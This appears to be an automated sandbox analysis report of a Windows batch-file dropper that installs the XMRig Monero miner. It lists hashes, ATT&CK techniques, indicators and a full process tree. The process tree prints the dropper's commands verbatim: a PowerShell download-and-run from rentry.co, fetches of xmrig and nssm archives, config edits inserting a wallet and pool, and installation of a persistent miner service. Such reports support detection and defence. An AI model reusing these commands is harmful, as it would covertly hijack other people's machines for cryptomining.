xmrig | 4a084dd6b556a67848483a5763f8d3eebadc0527f804f102f7f944b23b31cb12

Analysis

max time kernel
1050s
max time network
1056s
platform
windows10-1703_x64
resource
win10-20240404-en
resource tags

arch:x64arch:x86image:win10-20240404-enlocale:en-usos:windows10-1703-x64system
submitted
30/06/2024, 14:31

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

119112648419455.bat
Size

517B
MD5

ac9d73455d58bfa42f81e718b8c8d6b5
SHA1

60040fff333b7bc09b22e5c013f11b8a99555ed3
SHA256

4a084dd6b556a67848483a5763f8d3eebadc0527f804f102f7f944b23b31cb12
SHA512

ad24994554a8e6bb68f5ca80b1c53379f7a577964165f56d2f6bef14340fec3d0f17d14faa2db4651776a83bd5686f26ee59080ee2a16d0468b8d38504e460b2

Score

10^/10

xmrig evasion execution miner

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://rentry.co/regele/raw

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://raw.githubusercontent.com/MoneroOcean/xmrig_setup/master/xmrig.zip

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://raw.githubusercontent.com/MoneroOcean/xmrig_setup/master/nssm.zip

Signatures

XMRig Miner payload 64 IoCs

miner

resource	yara_rule
behavioral1/files/0x000700000001ac2d-130.dat	family_xmrig
behavioral1/files/0x000700000001ac2d-130.dat	xmrig
behavioral1/memory/660-133-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/2296-415-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/2296-416-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/2296-417-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/2296-418-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/2296-419-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/2296-420-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/2296-421-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/2296-422-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/2296-423-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/2296-424-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/2296-425-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/2296-426-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/2296-427-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/2296-428-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/2296-429-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/2296-430-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/2296-431-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/2296-432-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/2296-433-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/2296-434-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/2296-435-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/2296-436-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/2296-437-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/2296-438-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/2296-439-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/2296-440-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/2296-441-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/2296-442-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/2296-443-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/2296-444-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/2296-445-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/2296-446-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/2296-447-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/2296-448-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/2296-449-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/2296-451-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/2296-452-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/2296-453-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/2296-454-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/2296-455-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/2296-456-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/2296-457-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/2296-458-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/2296-459-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/2296-460-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/2296-461-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/2296-462-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/2296-463-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/2296-464-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/2296-465-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/2296-466-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/2296-467-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/2296-468-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/2296-469-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/2296-470-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/2296-471-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/2296-472-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/2296-473-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/2296-474-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/2296-475-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/2296-476-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

Blocklisted process makes network request 3 IoCs

flow	pid	Process
2	3712	powershell.exe
5	3388	powershell.exe
8	5056	powershell.exe

Stops running service(s) 4 TTPs
evasion execution

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Service Execution
T1569.002

Executes dropped EXE 9 IoCs

pid	Process
660	xmrig.exe
4328	nssm.exe
3576	nssm.exe
4000	nssm.exe
3904	nssm.exe
2220	nssm.exe
1292	nssm.exe
820	nssm.exe
2296	xmrig.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs

Web Service

T1102

flow	ioc
4	raw.githubusercontent.com
5	raw.githubusercontent.com
8	raw.githubusercontent.com

Launches sc.exe 4 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
3920	sc.exe
4652	sc.exe
4240	sc.exe
2952	sc.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 13 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
1316	powershell.exe
4100	powershell.exe
5036	powershell.exe
5028	powershell.exe
640	powershell.exe
684	powershell.exe
3712	powershell.exe
4552	powershell.exe
1292	powershell.exe
5056	powershell.exe
4400	powershell.exe
2408	powershell.exe
3388	powershell.exe

Delays execution with timeout.exe 64 IoCs

evasion

pid	Process
1632	timeout.exe
4668	timeout.exe
4312	timeout.exe
1220	Process not Found
2220	Process not Found
684	timeout.exe
2432	timeout.exe
3040	timeout.exe
3220	timeout.exe
3448	Process not Found
660	timeout.exe
2628	timeout.exe
3448	timeout.exe
988	Process not Found
3696	Process not Found
660	timeout.exe
4116	timeout.exe
644	timeout.exe
4288	timeout.exe
4212	Process not Found
4988	Process not Found
2876	Process not Found
2248	Process not Found
616	timeout.exe
3172	timeout.exe
3444	timeout.exe
224	timeout.exe
3420	Process not Found
1984	Process not Found
2012	Process not Found
1496	timeout.exe
4624	timeout.exe
4212	timeout.exe
5072	timeout.exe
3808	timeout.exe
4764	timeout.exe
868	Process not Found
3064	timeout.exe
3428	timeout.exe
4972	Process not Found
728	timeout.exe
4880	timeout.exe
3272	timeout.exe
1300	timeout.exe
344	timeout.exe
308	Process not Found
868	Process not Found
1008	Process not Found
3232	timeout.exe
3900	timeout.exe
4236	timeout.exe
2028	Process not Found
1808	Process not Found
3724	timeout.exe
744	timeout.exe
4516	timeout.exe
3720	timeout.exe
2988	Process not Found
2884	Process not Found
2784	timeout.exe
3192	timeout.exe
1564	timeout.exe
676	timeout.exe
2932	Process not Found

Kills process with taskkill 1 IoCs

evasion

pid	Process
588	taskkill.exe

Runs net.exe

Suspicious behavior: EnumeratesProcesses 39 IoCs

pid	Process
3712	powershell.exe
3712	powershell.exe
3712	powershell.exe
3388	powershell.exe
3388	powershell.exe
3388	powershell.exe
5036	powershell.exe
5036	powershell.exe
5036	powershell.exe
5028	powershell.exe
5028	powershell.exe
5028	powershell.exe
4552	powershell.exe
4552	powershell.exe
4552	powershell.exe
4400	powershell.exe
4400	powershell.exe
4400	powershell.exe
1292	powershell.exe
1292	powershell.exe
1292	powershell.exe
640	powershell.exe
640	powershell.exe
640	powershell.exe
684	powershell.exe
684	powershell.exe
684	powershell.exe
1316	powershell.exe
1316	powershell.exe
1316	powershell.exe
2408	powershell.exe
2408	powershell.exe
2408	powershell.exe
5056	powershell.exe
5056	powershell.exe
5056	powershell.exe
4100	powershell.exe
4100	powershell.exe
4100	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	3712	powershell.exe
Token: SeDebugPrivilege	588	taskkill.exe
Token: SeDebugPrivilege	3388	powershell.exe
Token: SeDebugPrivilege	5036	powershell.exe
Token: SeDebugPrivilege	5028	powershell.exe
Token: SeDebugPrivilege	4552	powershell.exe
Token: SeDebugPrivilege	4400	powershell.exe
Token: SeDebugPrivilege	1292	powershell.exe
Token: SeDebugPrivilege	640	powershell.exe
Token: SeDebugPrivilege	684	powershell.exe
Token: SeDebugPrivilege	1316	powershell.exe
Token: SeDebugPrivilege	2408	powershell.exe
Token: SeDebugPrivilege	5056	powershell.exe
Token: SeDebugPrivilege	4100	powershell.exe
Token: SeLockMemoryPrivilege	2296	xmrig.exe
Token: SeIncreaseQuotaPrivilege	2588	WMIC.exe
Token: SeSecurityPrivilege	2588	WMIC.exe
Token: SeTakeOwnershipPrivilege	2588	WMIC.exe
Token: SeLoadDriverPrivilege	2588	WMIC.exe
Token: SeSystemProfilePrivilege	2588	WMIC.exe
Token: SeSystemtimePrivilege	2588	WMIC.exe
Token: SeProfSingleProcessPrivilege	2588	WMIC.exe
Token: SeIncBasePriorityPrivilege	2588	WMIC.exe
Token: SeCreatePagefilePrivilege	2588	WMIC.exe
Token: SeBackupPrivilege	2588	WMIC.exe
Token: SeRestorePrivilege	2588	WMIC.exe
Token: SeShutdownPrivilege	2588	WMIC.exe
Token: SeDebugPrivilege	2588	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2588	WMIC.exe
Token: SeRemoteShutdownPrivilege	2588	WMIC.exe
Token: SeUndockPrivilege	2588	WMIC.exe
Token: SeManageVolumePrivilege	2588	WMIC.exe
Token: 33	2588	WMIC.exe
Token: 34	2588	WMIC.exe
Token: 35	2588	WMIC.exe
Token: 36	2588	WMIC.exe
Token: SeIncreaseQuotaPrivilege	2588	WMIC.exe
Token: SeSecurityPrivilege	2588	WMIC.exe
Token: SeTakeOwnershipPrivilege	2588	WMIC.exe
Token: SeLoadDriverPrivilege	2588	WMIC.exe
Token: SeSystemProfilePrivilege	2588	WMIC.exe
Token: SeSystemtimePrivilege	2588	WMIC.exe
Token: SeProfSingleProcessPrivilege	2588	WMIC.exe
Token: SeIncBasePriorityPrivilege	2588	WMIC.exe
Token: SeCreatePagefilePrivilege	2588	WMIC.exe
Token: SeBackupPrivilege	2588	WMIC.exe
Token: SeRestorePrivilege	2588	WMIC.exe
Token: SeShutdownPrivilege	2588	WMIC.exe
Token: SeDebugPrivilege	2588	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2588	WMIC.exe
Token: SeRemoteShutdownPrivilege	2588	WMIC.exe
Token: SeUndockPrivilege	2588	WMIC.exe
Token: SeManageVolumePrivilege	2588	WMIC.exe
Token: 33	2588	WMIC.exe
Token: 34	2588	WMIC.exe
Token: 35	2588	WMIC.exe
Token: 36	2588	WMIC.exe
Token: SeIncreaseQuotaPrivilege	5084	WMIC.exe
Token: SeSecurityPrivilege	5084	WMIC.exe
Token: SeTakeOwnershipPrivilege	5084	WMIC.exe
Token: SeLoadDriverPrivilege	5084	WMIC.exe
Token: SeSystemProfilePrivilege	5084	WMIC.exe
Token: SeSystemtimePrivilege	5084	WMIC.exe
Token: SeProfSingleProcessPrivilege	5084	WMIC.exe

Suspicious use of FindShellTrayWindow 1 IoCs

pid	Process
2296	xmrig.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 220 wrote to memory of 3712	220	cmd.exe	75
PID 220 wrote to memory of 3712	220	cmd.exe	75
PID 3712 wrote to memory of 2528	3712	powershell.exe	76
PID 3712 wrote to memory of 2528	3712	powershell.exe	76
PID 2528 wrote to memory of 5100	2528	cmd.exe	77
PID 2528 wrote to memory of 5100	2528	cmd.exe	77
PID 5100 wrote to memory of 3904	5100	net.exe	78
PID 5100 wrote to memory of 3904	5100	net.exe	78
PID 2528 wrote to memory of 4796	2528	cmd.exe	79
PID 2528 wrote to memory of 4796	2528	cmd.exe	79
PID 2528 wrote to memory of 3864	2528	cmd.exe	80
PID 2528 wrote to memory of 3864	2528	cmd.exe	80
PID 2528 wrote to memory of 4832	2528	cmd.exe	81
PID 2528 wrote to memory of 4832	2528	cmd.exe	81
PID 2528 wrote to memory of 404	2528	cmd.exe	82
PID 2528 wrote to memory of 404	2528	cmd.exe	82
PID 2528 wrote to memory of 2984	2528	cmd.exe	83
PID 2528 wrote to memory of 2984	2528	cmd.exe	83
PID 2528 wrote to memory of 3920	2528	cmd.exe	84
PID 2528 wrote to memory of 3920	2528	cmd.exe	84
PID 2528 wrote to memory of 4652	2528	cmd.exe	85
PID 2528 wrote to memory of 4652	2528	cmd.exe	85
PID 2528 wrote to memory of 588	2528	cmd.exe	86
PID 2528 wrote to memory of 588	2528	cmd.exe	86
PID 2528 wrote to memory of 3388	2528	cmd.exe	88
PID 2528 wrote to memory of 3388	2528	cmd.exe	88
PID 2528 wrote to memory of 5036	2528	cmd.exe	89
PID 2528 wrote to memory of 5036	2528	cmd.exe	89
PID 2528 wrote to memory of 5028	2528	cmd.exe	90
PID 2528 wrote to memory of 5028	2528	cmd.exe	90
PID 2528 wrote to memory of 660	2528	cmd.exe	91
PID 2528 wrote to memory of 660	2528	cmd.exe	91
PID 2528 wrote to memory of 1300	2528	cmd.exe	92
PID 2528 wrote to memory of 1300	2528	cmd.exe	92
PID 1300 wrote to memory of 4552	1300	cmd.exe	93
PID 1300 wrote to memory of 4552	1300	cmd.exe	93
PID 4552 wrote to memory of 308	4552	powershell.exe	94
PID 4552 wrote to memory of 308	4552	powershell.exe	94
PID 2528 wrote to memory of 4400	2528	cmd.exe	95
PID 2528 wrote to memory of 4400	2528	cmd.exe	95
PID 2528 wrote to memory of 1292	2528	cmd.exe	96
PID 2528 wrote to memory of 1292	2528	cmd.exe	96
PID 2528 wrote to memory of 640	2528	cmd.exe	97
PID 2528 wrote to memory of 640	2528	cmd.exe	97
PID 2528 wrote to memory of 684	2528	cmd.exe	98
PID 2528 wrote to memory of 684	2528	cmd.exe	98
PID 2528 wrote to memory of 1316	2528	cmd.exe	99
PID 2528 wrote to memory of 1316	2528	cmd.exe	99
PID 2528 wrote to memory of 2408	2528	cmd.exe	100
PID 2528 wrote to memory of 2408	2528	cmd.exe	100
PID 2528 wrote to memory of 5056	2528	cmd.exe	101
PID 2528 wrote to memory of 5056	2528	cmd.exe	101
PID 2528 wrote to memory of 4100	2528	cmd.exe	102
PID 2528 wrote to memory of 4100	2528	cmd.exe	102
PID 2528 wrote to memory of 4240	2528	cmd.exe	103
PID 2528 wrote to memory of 4240	2528	cmd.exe	103
PID 2528 wrote to memory of 2952	2528	cmd.exe	159
PID 2528 wrote to memory of 2952	2528	cmd.exe	159
PID 2528 wrote to memory of 4328	2528	cmd.exe	161
PID 2528 wrote to memory of 4328	2528	cmd.exe	161
PID 2528 wrote to memory of 3576	2528	cmd.exe	106
PID 2528 wrote to memory of 3576	2528	cmd.exe	106
PID 2528 wrote to memory of 4000	2528	cmd.exe	162
PID 2528 wrote to memory of 4000	2528	cmd.exe	162

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\119112648419455.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:220
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command "$wc = New-Object System.Net.WebClient; $tempfile = [System.IO.Path]::GetTempFileName(); $tempfile += '.bat'; $wc.DownloadFile('https://rentry.co/regele/raw', $tempfile); & $tempfile 42cRnHwcKM6bmza8jmWyvWB2tjAcxQGmJ1QHhJ9ae55qRx488q6cvAU42EKkEiEd2N9TE1UjNViUSNVqV1NJ17R79fDhjVL; Remove-Item -Force $tempfile"
  2⤵
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:3712
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp7D0F.tmp.bat" 42cRnHwcKM6bmza8jmWyvWB2tjAcxQGmJ1QHhJ9ae55qRx488q6cvAU42EKkEiEd2N9TE1UjNViUSNVqV1NJ17R79fDhjVL"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2528
  - - C:\Windows\system32\net.exe
      net session
      4⤵
      Suspicious use of WriteProcessMemory
      PID:5100
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 session
        5⤵
        
        PID:3904
  - - C:\Windows\system32\where.exe
      where powershell
      4⤵
      PID:4796
  - - C:\Windows\system32\where.exe
      where find
      4⤵
      PID:3864
  - - C:\Windows\system32\where.exe
      where findstr
      4⤵
      PID:4832
  - - C:\Windows\system32\where.exe
      where tasklist
      4⤵
      PID:404
  - - C:\Windows\system32\where.exe
      where sc
      4⤵
      PID:2984
  - - C:\Windows\system32\sc.exe
      sc stop moneroocean_miner
      4⤵
      Launches sc.exe
      PID:3920
  - - C:\Windows\system32\sc.exe
      sc delete moneroocean_miner
      4⤵
      Launches sc.exe
      PID:4652
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /t /im xmrig.exe
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:588
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "$wc = New-Object System.Net.WebClient; $wc.DownloadFile('https://raw.githubusercontent.com/MoneroOcean/xmrig_setup/master/xmrig.zip', 'C:\Users\Admin\xmrig.zip')"
      4⤵
      Blocklisted process makes network request
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3388
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "Add-Type -AssemblyName System.IO.Compression.FileSystem; [System.IO.Compression.ZipFile]::ExtractToDirectory('C:\Users\Admin\xmrig.zip', 'C:\Users\Admin\moneroocean')"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:5036
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "$out = cat 'C:\Users\Admin\moneroocean\config.json' | %{$_ -replace '\"donate-level\": *\d*,', '\"donate-level\": 1,'} | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\moneroocean\config.json'"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:5028
  - - C:\Users\Admin\moneroocean\xmrig.exe
      "C:\Users\Admin\moneroocean\xmrig.exe" --help
      4⤵
      Executes dropped EXE
      PID:660
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c powershell -Command "hostname | %{$_ -replace '[^a-zA-Z0-9]+', '_'}"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:1300
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "hostname | %{$_ -replace '[^a-zA-Z0-9]+', '_'}"
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:4552
      - C:\Windows\system32\HOSTNAME.EXE
        
        "C:\Windows\system32\HOSTNAME.EXE"
        6⤵
        
        PID:308
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "$out = cat 'C:\Users\Admin\moneroocean\config.json' | %{$_ -replace '\"url\": *\".*\",', '\"url\": \"gulf.moneroocean.stream:10004 \",'} | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\moneroocean\config.json'"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4400
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "$out = cat 'C:\Users\Admin\moneroocean\config.json' | %{$_ -replace '\"user\": *\".*\",', '\"user\": \"42cRnHwcKM6bmza8jmWyvWB2tjAcxQGmJ1QHhJ9ae55qRx488q6cvAU42EKkEiEd2N9TE1UjNViUSNVqV1NJ17R79fDhjVL\",'} | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\moneroocean\config.json'"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1292
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "$out = cat 'C:\Users\Admin\moneroocean\config.json' | %{$_ -replace '\"pass\": *\".*\",', '\"pass\": \"Ndtnzvhn\",'} | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\moneroocean\config.json'"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:640
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "$out = cat 'C:\Users\Admin\moneroocean\config.json' | %{$_ -replace '\"max-cpu-usage\": *\d*,', '\"max-cpu-usage\": 100,'} | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\moneroocean\config.json'"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:684
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "$out = cat 'C:\Users\Admin\moneroocean\config.json' | %{$_ -replace '\"log-file\": *null,', '\"log-file\": \"C:\\Users\\Admin\\moneroocean\\xmrig.log\",'} | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\moneroocean\config.json'"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1316
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "$out = cat 'C:\Users\Admin\moneroocean\config_background.json' | %{$_ -replace '\"background\": *false,', '\"background\": true,'} | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\moneroocean\config_background.json'"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2408
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "$wc = New-Object System.Net.WebClient; $wc.DownloadFile('https://raw.githubusercontent.com/MoneroOcean/xmrig_setup/master/nssm.zip', 'C:\Users\Admin\nssm.zip')"
      4⤵
      Blocklisted process makes network request
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:5056
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "Add-Type -AssemblyName System.IO.Compression.FileSystem; [System.IO.Compression.ZipFile]::ExtractToDirectory('C:\Users\Admin\nssm.zip', 'C:\Users\Admin\moneroocean')"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4100
  - - C:\Windows\system32\sc.exe
      sc stop moneroocean_miner
      4⤵
      Launches sc.exe
      PID:4240
  - - C:\Windows\system32\sc.exe
      sc delete moneroocean_miner
      4⤵
      Launches sc.exe
      PID:2952
  - - C:\Users\Admin\moneroocean\nssm.exe
      "C:\Users\Admin\moneroocean\nssm.exe" install moneroocean_miner "C:\Users\Admin\moneroocean\xmrig.exe"
      4⤵
      Executes dropped EXE
      PID:4328
  - - C:\Users\Admin\moneroocean\nssm.exe
      "C:\Users\Admin\moneroocean\nssm.exe" set moneroocean_miner AppDirectory "C:\Users\Admin\moneroocean"
      4⤵
      Executes dropped EXE
      PID:3576
  - - C:\Users\Admin\moneroocean\nssm.exe
      "C:\Users\Admin\moneroocean\nssm.exe" set moneroocean_miner AppPriority BELOW_NORMAL_PRIORITY_CLASS
      4⤵
      Executes dropped EXE
      PID:4000
  - - C:\Users\Admin\moneroocean\nssm.exe
      "C:\Users\Admin\moneroocean\nssm.exe" set moneroocean_miner AppStdout "C:\Users\Admin\moneroocean\stdout"
      4⤵
      Executes dropped EXE
      PID:3904
  - - C:\Users\Admin\moneroocean\nssm.exe
      "C:\Users\Admin\moneroocean\nssm.exe" set moneroocean_miner AppStderr "C:\Users\Admin\moneroocean\stderr"
      4⤵
      Executes dropped EXE
      PID:2220
  - - C:\Users\Admin\moneroocean\nssm.exe
      "C:\Users\Admin\moneroocean\nssm.exe" start moneroocean_miner
      4⤵
      Executes dropped EXE
      PID:1292
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2056
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2588
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:4880
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4992
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:5084
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:644
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1896
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4256
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:3000
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4808
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4720
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2248
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4608
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3884
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2320
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:376
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1316
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:3272
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4264
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:772
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4664
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4848
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1988
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2188
